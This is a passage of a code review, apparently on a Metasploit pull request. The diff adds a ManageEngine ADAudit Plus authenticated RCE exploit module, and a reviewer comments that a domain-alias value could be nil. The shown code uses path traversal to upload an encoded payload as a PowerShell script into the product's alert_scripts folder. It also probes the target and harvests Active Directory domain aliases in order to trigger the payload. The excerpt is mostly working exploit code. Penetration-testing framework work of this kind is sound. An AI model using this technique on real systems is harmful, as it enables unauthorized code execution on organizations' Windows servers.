modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,595 @@
+    end
+
+    gpo_post_data = {
+      'DOMAIN_NAME' => @domain,
+      'html_fileName' => "..\\..\\..\\..\\..\\alert_scripts\\#{ps1_script_name}", # the traversal path to alert_scripts should always be correct no matter where ADAudit Plus is installed
+      'htmlReport' => payload.encoded
+    }
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => adaudit_plus_gpo_watcher_data_uri,
+      'ctype' => 'application/json',
+      'data' => generate_gpo_watcher_data_json(gpo_post_data)
+    })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection failed')
+    end
+
+    unless res.code == 200 && res.body.include?('{"success":true}')
+      fail_with(Failure::Unknown, 'Failed to upload the payload.')
+    end
+
+    print_good("Successfully wrote the payload to /alert_scripts/#{ps1_script_name} in the ManageEngine ADAudit Plus install directory")
+    ps1_script_name
+  end
+
+  def check
+    target_check_results = adaudit_plus_target_check
+    target_check_msg = target_check_results['message']
+    case target_check_results['status']
+    when adaudit_plus_status::CONNECTION_FAILED
+      return CheckCode::Unknown(target_check_msg)
+    when adaudit_plus_status::UNEXPECTED_REPLY
+      return CheckCode::Safe(target_check_msg)
+    when adaudit_plus_status::SUCCESS
+      vprint_status(target_check_msg)
+    else
+      # this covers cases that may be added in the future
+      return CheckCode::Unknown(target_check_msg)
+    end
+
+    target_check_res = target_check_results['server_response']
+
+    # In order to trigger the final payload in the exploit method, we will need to send an authentication request to
+    # ADAudit Plus with incorrect Active Directory credentials if the user didn't provide an Active Directory domain,
+    # we can try to extract the FQDN for a configured domain from the server response
+    domain_alias_results = adaudit_plus_grab_domain_aliases(target_check_res)
+    domain_alias_msg = domain_alias_results['message']
+    if domain_alias_results['status'] == adaudit_plus_status::NO_DOMAINS
+      return CheckCode::Safe(domain_alias_msg)
+    end
+
+    domain_aliases = domain_alias_results['domain_aliases']
+    # if the only configured domain is the default domain, we will not be able to trigger the payload, so there is no point to proceed
+    if domain_aliases == ['ADAuditPlus Authentication']
+      return CheckCode::Safe('No Active Directory domains are configured on the target, so the module will not be able to trigger the payload.')
+    end
+
+    # set the domain alias to the first configured domain, unless the user provided an invalid domain
+    # in the latter case, the module won't be able to authenticate to the target so there's no point to proceed
+    if auth_domain == 'ADAuditPlus Authentication' || domain_aliases&.include?(auth_domain)
+      vprint_status(domain_alias_msg)
+      @domain_alias = domain_aliases.first
```

Comment:
Should check this isn't `nil` as doing `[].first` will result in `@domain_alias` being set to `nil`.